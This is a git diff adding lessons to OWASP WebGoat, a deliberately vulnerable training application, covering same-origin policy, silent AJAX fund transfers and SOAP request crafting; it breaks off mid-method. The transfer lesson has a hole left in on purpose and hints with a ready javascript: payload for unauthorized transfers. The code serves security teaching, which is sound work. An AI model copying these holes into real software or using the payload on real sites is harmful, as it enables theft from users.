diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java
new file mode 100644
index 000000000..5d41998c6
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SameOriginPolicyProtection.java
@@ -0,0 +1,204 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.H2;
+import org.apache.ecs.html.H3;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.Script;
+import org.apache.ecs.html.TextArea;
+import org.apache.ecs.xhtml.button;
+import org.apache.ecs.xhtml.link;
+import org.owasp.webgoat.session.*;
+
+
+public class SameOriginPolicyProtection extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+    
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	
+	try
+	{
+		
+		ec.addElement(new Script()
+		.setSrc("javascript/sameOrigin.js"));
+		
+		Input hiddenWGStatus = new Input(Input.HIDDEN,"hiddenWGStatus",0);
+		hiddenWGStatus.setID("hiddenWGStatus");		
+		ec.addElement(hiddenWGStatus);
+		
+		Input hiddenGoogleStatus = new Input(Input.HIDDEN,"hiddenGoogleStatus",0);
+		hiddenGoogleStatus.setID("hiddenGoogleStatus");	
+		ec.addElement(hiddenGoogleStatus);
+		
+		
+		
+	    ec.addElement(new StringElement("Enter a URL: "));
+	    ec.addElement(new BR());
+
+	    TextArea urlArea = new TextArea();
+	    urlArea.setID("requestedURL");
+	    urlArea.setRows(1);
+	    urlArea.setCols(60);
+	    urlArea.setWrap("SOFT");
+	    ec.addElement(urlArea);
+
+	    
+	    button b = new button();
+	    b.setValue("Go!");
+	    b.setType(button.button);
+	    b.setName("Go!");
+		b.setOnClick("submitXHR();");
+		b.addElement("Go!");		
+	    ec.addElement(b);
+	    
+	    
+	    
+	    
+	    
+	    ec.addElement(new BR());
+	    ec.addElement(new BR());
+	    
+	 
+	    
+	    
+	    H3 reponseTitle = new H3("Response: ");
+	    reponseTitle.setID("responseTitle");
+	    
+	    
+	    ec.addElement(reponseTitle);
+	    //ec.addElement(new BR());
+	
+	    
+	    TextArea ta = new TextArea();
+	    ta.setName("responseArea");
+	    ta.setID("responseArea");
+	    ta.setCols(60);
+	    ta.setRows(4);
+	    ec.addElement(ta);
+	    ec.addElement(new BR());
+	    
+	    
+	    
+	   
+	    String webGoatURL = "lessons/Ajax/sameOrigin.jsp";
+	    String googleURL = "http://www.google.com/search?q=aspect+security";
+	    
+	    ec.addElement(new BR());
+	    
+	    A webGoat = new A();
+	    webGoat.setHref("javascript:populate(\"" + webGoatURL + "\")");
+	    webGoat.addElement("Click here to try a Same Origin request:<BR/> " + webGoatURL);
+	    ec.addElement(webGoat);
+	    
+	    ec.addElement(new BR());
+	    ec.addElement(new BR());
+	    
+	    A google = new A();
+	    google.setHref("javascript:populate(\"" + googleURL + "\")");
+	    google.addElement("Click here to try a Different Origin request:<BR/> " + googleURL);
+	    ec.addElement(google);
+	    
+	    
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	
+	
+
+	int hiddenWGStatusInt = s.getParser().getIntParameter("hiddenWGStatus",0);
+	int hiddenGoogleStatusInt = s.getParser().getIntParameter("hiddenGoogleStatus",0);
+	
+	System.out.println("hiddenWGStatus:" + hiddenWGStatusInt);
+	System.out.println("hiddenGoogleStatusInt:" + hiddenGoogleStatusInt);
+	
+	
+	if (hiddenWGStatusInt == 1 && hiddenGoogleStatusInt == 1)
+	{
+	    makeSuccess(s);
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("Enter a URL to see if it is allowed.");
+	hints.add("Click both of the links below to complete the lesson");
+
+	return hints;
+    }
+
+    /**
+     *  Gets the ranking attribute of the HelloScreen object
+     *
+     * @return    The ranking value
+     */
+    private final static Integer DEFAULT_RANKING = new Integer(10);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.AJAX_SECURITY;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Same Origin Policy Protection");
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+    public String getInstructions(WebSession s) {
+		String instructions = "This exercise demonstrates the " +
+				"Same Origin Policy Protection.  XHR requests can only be passed back to " +
+				" the originating server.  Attempts to pass data to a non-originating server " + 
+				" will fail.";
+
+		
+		return (instructions);
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
new file mode 100755
index 000000000..56dd2224d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SequentialLessonAdapter.java
@@ -0,0 +1,139 @@
+package org.owasp.webgoat.lessons;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.owasp.webgoat.session.LessonTracker;
+import org.owasp.webgoat.session.SequentialLessonTracker;
+import org.owasp.webgoat.session.WebSession;
+
+public abstract class SequentialLessonAdapter extends LessonAdapter {
+
+
+    public void setStage(WebSession s, int stage)
+    {
+	// System.out.println("Changed to stage " + stage);
+	getLessonTracker(s).setStage(stage);
+    }
+
+    /* By default returns 1 stage.
+     * (non-Javadoc)
+     */
+    public int getStageCount() {
+    	return 1;
+    }
+
+    public int getStage(WebSession s)
+    {
+	int stage = getLessonTracker(s).getStage();
+
+	// System.out.println("In stage " + stage);
+	return stage;
+    }
+
+	@Override
+    public SequentialLessonTracker getLessonTracker(WebSession s) {
+    	return (SequentialLessonTracker) super.getLessonTracker(s);
+    }
+
+
+	@Override
+	public SequentialLessonTracker getLessonTracker(WebSession s, AbstractLesson lesson) {
+		return (SequentialLessonTracker) super.getLessonTracker(s, lesson);
+	}
+
+
+	@Override
+	public SequentialLessonTracker getLessonTracker(WebSession s, String userNameOverride) {
+		return (SequentialLessonTracker) super.getLessonTracker(s, userNameOverride);
+	}
+
+	@Override
+	public LessonTracker createLessonTracker() {
+		return new SequentialLessonTracker();
+	}
+
+    protected Element createStagedContent(WebSession s)
+    {
+	try
+	{
+	    int stage = getLessonTracker(s).getStage();
+	    //int stage = Integer.parseInt( getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE,"1"));
+
+	    switch (stage)
+	    {
+		case 1:
+		    return (doStage1(s));
+		case 2:
+		    return (doStage2(s));
+		case 3:
+		    return (doStage3(s));
+		case 4:
+		    return (doStage4(s));
+		case 5:
+		    return (doStage5(s));
+		case 6:
+		    return (doStage6(s));
+		default:
+		    throw new Exception("Invalid stage");
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    System.out.println(e);
+	    e.printStackTrace();
+	}
+
+	return (new StringElement(""));
+    }
+
+
+    protected Element doStage1(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement("Stage 1 Stub");
+	return ec;
+    }
+
+
+    protected Element doStage2(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement("Stage 2 Stub");
+	return ec;
+    }
+
+
+    protected Element doStage3(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement("Stage 3 Stub");
+	return ec;
+    }
+
+
+    protected Element doStage4(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement("Stage 4 Stub");
+	return ec;
+    }
+
+
+    protected Element doStage5(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement("Stage 5 Stub");
+	return ec;
+    }
+
+
+    protected Element doStage6(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+	ec.addElement("Stage 6 Stub");
+	return ec;
+    }
+    
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
new file mode 100644
index 000000000..ecb983b4e
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SilentTransactions.java
@@ -0,0 +1,315 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.PrintWriter;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.H3;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    December 26, 2006
+ */
+
+public class SilentTransactions extends LessonAdapter
+{
+
+    private final static Integer DEFAULT_RANKING = new Integer(40);
+
+    private final static Double CURRENT_BALANCE = 11987.09;
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    public void handleRequest(WebSession s)
+    {
+
+	try
+	{
+	    if (s.getParser().getRawParameter("from", "").equals("ajax"))
+	    {
+		if (s.getParser().getRawParameter("confirm", "").equals(
+			"Confirm"))
+		{
+		    String amount = s.getParser().getRawParameter("amount", "");
+		    s.getResponse().setContentType("text/html");
+		    s.getResponse().setHeader("Cache-Control", "no-cache");
+		    PrintWriter out = new PrintWriter(s.getResponse()
+			    .getOutputStream());
+		    StringBuffer result = new StringBuffer();
+		    result
+			    .append("<br><br>* Congratulations. You have successfully completed this lesson.<br>");
+		    if (!amount.equals(""))
+		    {
+			result.append("You have just silently authorized ");
+			result.append(amount);
+			result.append("$ without the user interaction.<br>");
+		    }
+		    result
+			    .append("Now you can send out a spam email containing this link and whoever clicks on it<br>");
+		    result
+			    .append(" and happens to be logged in the same time will loose their money !!");
+		    out.print(result.toString());
+		    out.flush();
+		    out.close();
+		    getLessonTracker(s).setCompleted(true);
+		    return;
+		}
+		else if (s.getParser().getRawParameter("confirm", "").equals(
+			"Transferring"))
+		{
+		    s.getResponse().setContentType("text/html");
+		    s.getResponse().setHeader("Cache-Control", "no-cache");
+		    PrintWriter out = new PrintWriter(s.getResponse()
+			    .getOutputStream());
+		    out
+			    .print("<br><br>The Transaction has Completed Successfully.");
+		    out.flush();
+		    out.close();
+		    return;
+		}
+	    }
+	}
+	catch (Exception ex)
+	{
+	    ex.printStackTrace();
+	}
+
+	Form form = new Form(getFormAction(), Form.POST).setName("form")
+		.setEncType("");
+
+	form.addElement(createContent(s));
+
+	setContent(form);
+
+    }
+
+
+    /**
+     * Description of the Method
+     * 
+     * @param s Current WebSession
+     */
+
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	String lineSep = System.getProperty("line.separator");
+	String script = "<script>"
+		+ lineSep
+		+ "function processData(){"
+		+ lineSep
+		+ " var accountNo = document.getElementById('newAccount').value;"
+		+ lineSep
+		+ " var amount = document.getElementById('amount').value;"
+		+ lineSep
+		+ " if ( accountNo == ''){"
+		+ lineSep
+		+ " alert('Please enter a valid account number to transfer to.')"
+		+ lineSep
+		+ " return;"
+		+ lineSep
+		+ "}"
+		+ lineSep
+		+ " else if ( amount == ''){"
+		+ lineSep
+		+ " alert('Please enter a valid amount to transfer.')"
+		+ lineSep
+		+ " return;"
+		+ lineSep
+		+ "}"
+		+ lineSep
+		+ " var balanceValue = document.getElementById('balanceID').innerHTML;"
+		+ lineSep
+		+ " balanceValue = balanceValue.replace( new RegExp('$') , '');"
+		+ lineSep
+		+ " if ( parseFloat(amount) > parseFloat(balanceValue) ) {"
+		+ lineSep
+		+ " alert('You can not transfer more funds than what is available in your balance.')"
+		+ lineSep
+		+ " return;"
+		+ lineSep
+		+ "}"
+		+ lineSep
+		+ " document.getElementById('confirm').value  = 'Transferring'"
+		+ lineSep
+		+ "submitData(accountNo, amount);"
+		+ lineSep
+		+ " document.getElementById('confirm').value  = 'Confirm'"
+		+ lineSep
+		+ "balanceValue = parseFloat(balanceValue) - parseFloat(amount);"
+		+ lineSep
+		+ "balanceValue = balanceValue.toFixed(2);"
+		+ lineSep
+		+ "document.getElementById('balanceID').innerHTML = balanceValue + '$';"
+		+ lineSep
+		+ "}"
+		+ lineSep
+		+ "function submitData(accountNo, balance) {"
+		+ lineSep
+		+ "var url = '" + getLink()
+		+ "&from=ajax&newAccount='+ accountNo+ '&amount=' + balance +'&confirm=' + document.getElementById('confirm').value; "
+		+ lineSep + "if (typeof XMLHttpRequest != 'undefined') {"
+		+ lineSep + "req = new XMLHttpRequest();" + lineSep
+		+ "} else if (window.ActiveXObject) {" + lineSep
+		+ "req = new ActiveXObject('Microsoft.XMLHTTP');" + lineSep
+		+ "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
+		+ "   req.onreadystatechange = callback;" + lineSep
+		+ "   req.send(null);" + lineSep + "}" + lineSep
+		+ "function callback() {" + lineSep
+		+ "    if (req.readyState == 4) { " + lineSep
+		+ "        if (req.status == 200) { " + lineSep
+		+ "                   var result =  req.responseText ;"
+		+ lineSep
+		+ "			 var resultsDiv = document.getElementById('resultsDiv');"
+		+ lineSep + "				resultsDiv.innerHTML = '';" + lineSep
+		+ "				resultsDiv.innerHTML = result;" + lineSep
+		+ "        }}}" + lineSep + "</script>" + lineSep;
+
+	ec.addElement(new StringElement(script));
+	ec.addElement(new H1("Welcome to WebGoat Banking System"));
+	ec.addElement(new BR());
+	ec.addElement(new H3("Account Summary:"));
+
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1)
+		.setWidth("70%").setAlign("left");
+	ec.addElement(new BR());
+	TR tr = new TR();
+	tr.addElement(new TD(new StringElement("Account Balance:")));
+	tr.addElement(new TD(new StringElement("<div id='balanceID'>"
+		+ CURRENT_BALANCE.toString() + "$</div>")));
+	t1.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD(new StringElement("Transfer to Account:")));
+	Input newAccount = new Input();
+	newAccount.addAttribute("id", "newAccount");
+	newAccount.setType(Input.TEXT);
+	newAccount.setName("newAccount");
+	newAccount.setValue("");
+	tr.addElement(new TD(newAccount));
+	t1.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD(new StringElement("Transfer Amount:")));
+	Input amount = new Input();
+	amount.addAttribute("id", "amount");
+	amount.setType(Input.TEXT);
+	amount.setName("amount");
+	amount.setValue(0);
+	tr.addElement(new TD(amount));
+	t1.addElement(tr);
+
+	ec.addElement(t1);
+	ec.addElement(new BR());
+	ec.addElement(new BR());
+
+	ec.addElement(new PRE());
+	Input b = new Input();
+	b.setType(Input.BUTTON);
+	b.setName("confirm");
+	b.addAttribute("id", "confirm");
+	b.setValue("Confirm");
+	b.setOnClick("processData();");
+	ec.addElement(b);
+
+	ec.addElement(new BR());
+	Div div = new Div();
+	div.addAttribute("name", "resultsDiv");
+	div.addAttribute("id", "resultsDiv");
+	div.setStyle("font-weight: bold;color:red;");
+	ec.addElement(div);
+
+	return ec;
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.AJAX_SECURITY;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("Check the javascript in the HTML source.");
+	hints
+		.add("Check how the application calls a specific javascript function to execute the transaction.");
+	hints
+		.add("Check the javascript functions processData and submitData()");
+	hints
+		.add("Function submitData() is the one responsible for actually ececuting the transaction.");
+	hints
+		.add("Check if your browser supports running javascript from the address bar.");
+	hints.add("Try to navigate to 'javascript:submitData(1234556,11000);'");
+	return hints;
+
+    }
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Silent Transactions Attacks");
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
new file mode 100644
index 000000000..b9ecd06e9
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SoapRequest.java
@@ -0,0 +1,503 @@
+/*
+ * Created on May 26, 2005
+ *
+ * TODO To change the template for this generated file go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.WebgoatContext;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author asmolen
+ *
+ * TODO To change the template for this generated type comment go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+public class SoapRequest extends SequentialLessonAdapter
+{
+
+    public final static String firstName = "getFirstName";
+
+    public final static String lastName = "getLastName";
+
+    public final static String loginCount = "getLoginCount";
+
+    public final static String ccNumber = "getCreditCard";
+
+    //int instead of boolean to keep track of method invocation count
+    static int accessFirstName;
+
+    static int accessLastName;
+
+    static int accessCreditCard;
+
+    static int accessLoginCount;
+
+	private static WebgoatContext webgoatContext;
+	
+	/**
+	 * We maintain a static reference to WebgoatContext, since this class
+	 * is also automatically instantiated by the Axis web services module,
+	 * which does not call setWebgoatContext()
+	 * (non-Javadoc)
+	 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
+	 */
+	@Override
+	public void setWebgoatContext(WebgoatContext webgoatContext) {
+		SoapRequest.webgoatContext = webgoatContext;
+	}
+	
+	@Override
+	public WebgoatContext getWebgoatContext() {
+		return SoapRequest.webgoatContext;
+	}
+
+    protected Category getDefaultCategory()
+    {
+	return Category.WEB_SERVICES;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("Accessible operations are delimited by the &lt;operation&gt; tag contained within the &lt;portType&gt; section of the WSDL. <BR> Below is an example of a typical operation (getFirstName): <br><br>"
+			+ "&lt;wsdl:portType name=\"SoapRequest\"&gt; <br>"
+			+ "&lt;wsdl:<strong>operation name=\"getFirstName\"</strong>&gt;<br>"
+			+ "&lt;wsdl:input message=\"impl:getFirstNameRequest\" name=\"getFirstNameRequest\" /&gt;<br>"
+			+ "&lt;wsdl:output message=\"impl:getFirstNameResponse\" name=\"getFirstNameResponse\" /&gt;<br>"
+			+ "&lt;wsdlsoap:operation soapAction=\"\" /&gt;"
+			+ "&lt;/wsdl:portType&gt;<br><br>"
+			+ "The methods invoked are defined by the input and output message attributes. "
+			+ "Example: <strong>\"getFirstNameRequest\"</strong>");
+	hints
+		.add("There are several tags within a SOAP envelope. "
+			+ "Each namespace is defined in the &lt;definitions&gt; section of the WSDL, and is declared using the (xmlns:namespace_name_here=\"namespace_reference_location_here\") format.<br><br>"
+			+ "The following example defines a tag \"&lt;xsd:\", whose attribute structure will reference the namespace location assigned to it in the declaration:<br>"
+			+ "<strong>xmlns:xsd=\"http://www.w3.org/2001/XMLSchema</strong>");
+	hints
+		.add("Determine what parameters and types are required by the message definition corresponding to the operation's request method. "
+			+ "This example defines a parameter (id) of type (int) in the namespace (xsd) for the method (getFirstNameRequest):<br>"
+			+ "&lt;wsdl:message name=\"getFirstNameRequest\"<br><br>"
+			+ "&lt;wsdl:<strong>part name=\"id\" type=\"xsd:int\"</strong> /&gt;<br>"
+			+ "&lt;/wsdl:message&gt;<br><br>"
+			+ "Examples of other types:<br>"
+			+ "{boolean, byte, base64Binary, double, float, int, long, short, unsignedInt, unsignedLong, unsignedShort, string}.<br>");
+	String soapEnv = "A SOAP request uses the following HTTP header: <br><br> "
+		+ "SOAPAction: some action header, can be &quot;&quot; <br><br>"
+		+ "The SOAP message body has the following format:<br>"
+		+ "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; <br>"
+		+ "&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" <br>"
+		+ "	                  xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" <br>"
+		+ "	                  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"&gt; <br>"
+		+ "&nbsp;&nbsp;&lt;SOAP-ENV:Body&gt; <br>"
+		+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;ns1:getFirstName SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\"&gt; <br>"
+		+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;id xsi:type=\"xsd:int\"&gt;101&lt;/id&gt; <br>"
+		+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ns1:getFirstName&gt; <br>"
+		+ "&nbsp;&nbsp;&lt;/SOAP-ENV:Body&gt; <br>"
+		+ "&lt;/SOAP-ENV:Envelope&gt; <br><br>"
+		+ "Intercept the HTTP request and try to create a SOAP request.";
+	soapEnv.replaceAll("(?s) ", "&nbsp;");
+	hints.add(soapEnv);
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(100);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    public String getTitle()
+    {
+	return "Create a SOAP Request";
+    }
+
+
+    protected Element makeOperationsLine(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+	if (s.isColor())
+	{
+	    t1.setBorder(1);
+	}
+
+	TR tr = new TR();
+	tr.addElement(new TD()
+		.addElement("How many operations are defined in the WSDL: "));
+	tr.addElement(new TD(new Input(Input.TEXT, "count", "")));
+	Element b = ECSFactory.makeButton("Submit");
+	tr.addElement(new TD(b).setAlign("LEFT"));
+	t1.addElement(tr);
+
+	ec.addElement(t1);
+
+	return ec;
+    }
+
+
+    protected Element makeTypeLine(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+	if (s.isColor())
+	{
+	    t1.setBorder(1);
+	}
+
+	TR tr = new TR();
+	tr
+		.addElement(new TD()
+			.addElement("Now, what is the type of the (id) parameter in the \"getFirstNameRequest\" method: "));
+	tr.addElement(new TD(new Input(Input.TEXT, "type", "")));
+	Element b = ECSFactory.makeButton("Submit");
+	tr.addElement(new TD(b).setAlign("LEFT"));
+	t1.addElement(tr);
+
+	ec.addElement(t1);
+
+	return ec;
+    }
+
+
+    protected Element createContent(WebSession s)
+    {
+	return super.createStagedContent(s);
+    }
+
+
+    protected Element doStage1(WebSession s) throws Exception
+    {
+	return viewWsdl(s);
+    }
+
+
+    protected Element doStage2(WebSession s) throws Exception
+    {
+	return determineType(s);
+    }
+
+
+    protected Element doStage3(WebSession s) throws Exception
+    {
+	return createSoapEnvelope(s);
+    }
+
+
+    protected Element viewWsdl(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	//DEVNOTE: Test for stage completion.
+	try
+	{
+	    int operationCount = 0;
+	    operationCount = s.getParser().getIntParameter("count");
+
+	    if (operationCount == 4)
+	    {
+		getLessonTracker(s).setStage(2);
+		s.setMessage("Stage 1 completed.");
+
+		// Redirect user to Stage2 content.
+		ec.addElement(doStage2(s));
+	    }
+	    else
+	    {
+		s.setMessage("Sorry, that is an incorrect count. Try Again.");
+	    }
+	}
+	catch (NumberFormatException nfe)
+	{
+	    //DEVNOTE: Eat the exception.
+	    //ec.addElement( new P().addElement( nfe.getMessage() ) );
+	    s.setMessage("Sorry, that answer is invalid. Try again.");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    //DEVNOTE: Eat the exception.
+	    // ec.addElement( new P().addElement( pnfe.getMessage() ) );
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	//DEVNOTE: Conditionally display Stage1 content depending on whether stage is completed or not
+	if (getLessonTracker(s).getStage() == 1)
+	//if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
+	//	(getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("1") )
+	{
+	    ec.addElement(makeOperationsLine(s));
+
+	    A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
+	    ec
+		    .addElement(new P()
+			    .addElement("View the following WSDL and count available operations:"));
+	    ec.addElement(new BR());
+	    ec.addElement(a);
+	}
+
+	//getLessonTracker( s ).setCompleted( SoapRequest.completed );
+
+	return (ec);
+    }
+
+
+    protected Element determineType(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	//DEVNOTE: Test for stage completion.
+	try
+	{
+	    String paramType = "";
+	    paramType = s.getParser().getStringParameter("type");
+
+	    //if (paramType.equalsIgnoreCase("int"))
+	    if (paramType.equals("int"))
+	    {
+		getLessonTracker(s).setStage(3);
+		s.setMessage("Stage 2 completed. ");
+		//s.setMessage("Now, you'll craft a SOAP envelope for invoking a web service directly.");
+
+		// Redirect user to Stage2 content.
+		ec.addElement(doStage3(s));
+	    }
+	    else
+	    {
+		s.setMessage("Sorry, that is an incorrect type. Try Again.");
+	    }
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    //DEVNOTE: Eat the exception.
+	    // ec.addElement( new P().addElement( pnfe.getMessage() ) );
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	//DEVNOTE: Conditionally display Stage2 content depending on whether stage is completed or not
+	if (getLessonTracker(s).getStage() == 2)
+	//if ( null == (getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)) ||
+	//	(getLessonTracker(s).getLessonProperties().getProperty(WebSession.STAGE)).equals("2") )
+	{
+	    ec.addElement(makeTypeLine(s));
+
+	    A a = new A("services/SoapRequest?WSDL", "WebGoat WSDL File");
+	    ec
+		    .addElement(new P()
+			    .addElement("View the following WSDL and count available operations:"));
+	    ec.addElement(new BR());
+	    ec.addElement(a);
+	}
+
+	//getLessonTracker( s ).setCompleted( SoapRequest.completed );
+
+	return (ec);
+    }
+
+
+    protected Element createSoapEnvelope(WebSession s)
+    {
